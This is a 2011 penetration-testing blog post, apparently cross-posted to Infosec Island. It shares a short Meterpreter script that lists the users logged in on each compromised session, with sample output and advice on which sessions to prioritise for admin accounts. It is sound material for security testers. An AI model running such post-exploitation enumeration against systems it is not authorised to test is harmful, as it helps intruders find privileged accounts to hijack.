Who's Logged In? A Quick Way to Pick Your Targets

Tuesday, October 04, 2011

Rob Fuller


Say you go for the 500+ shells on an internal test or your phishing exercise goes way better than you thought.

Well you need to get your bearings quickly and going into each shell and doing a Ps, then looking through the list for all the users logged in is a bit of a pain and definitely not ideal.

I wrote a quick script that you can throw in the Meterpreter scripts folder to aide you a bit with this:

users = []
client.sys.process.each_process do |x|
        users << x["user"]



users.delete_if {|x| x =~ /^NT\ AUTHORITY/}

users.delete_if {|x| x == ""}

loggedin = users.join(', ')


All it does is automate the process I said above, used in concert with the 'sessions -s' command makes life a bit easier:

msf  post(enum_logged_on) > sessions -s loggedin

[*] Running script loggedin on all sessions...

[*] Session 1 (victimgatewayaddress:21638):

[*] DOMAIN\User1

[*] Session 2 (victimgatewayaddress:39900):

[*] DOMAIN\AdminUser1

[*] Session 3 (victimgatewayaddress:59395):

[*] DOMAIN\User5

[*] Session 5 (victimgatewayaddress:21639):

[*] DOMAIN\User20

[*] Session 6 (victimgatewayaddress:21640):

[*] COMPUTERNAME\Administrator, DOMAIN2\AdminUser7

[*] Session 7 (victimgatewayaddress:39901):

[*] DOMAIN\User55

You can see from this output I probably want to start with session 2, and probably 6 as well as it seems to be on another domain and an admin to boot.

The example is small but on a larger scale this can start to be much more important for time management.

I'm sure there are some of you out there that realized after spending hours with another session that you had one with a DA signed into it on a different system.

Just a disclaimer, this ONLY shows who is logged into the sessions you have, not remote systems.

Cross-posted from Room 362

Possibly Related Articles:
Information Security
Hacking Security Testing Penetration Testing Network Security Meterpreter Login Target
Post Rating I Like this!
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.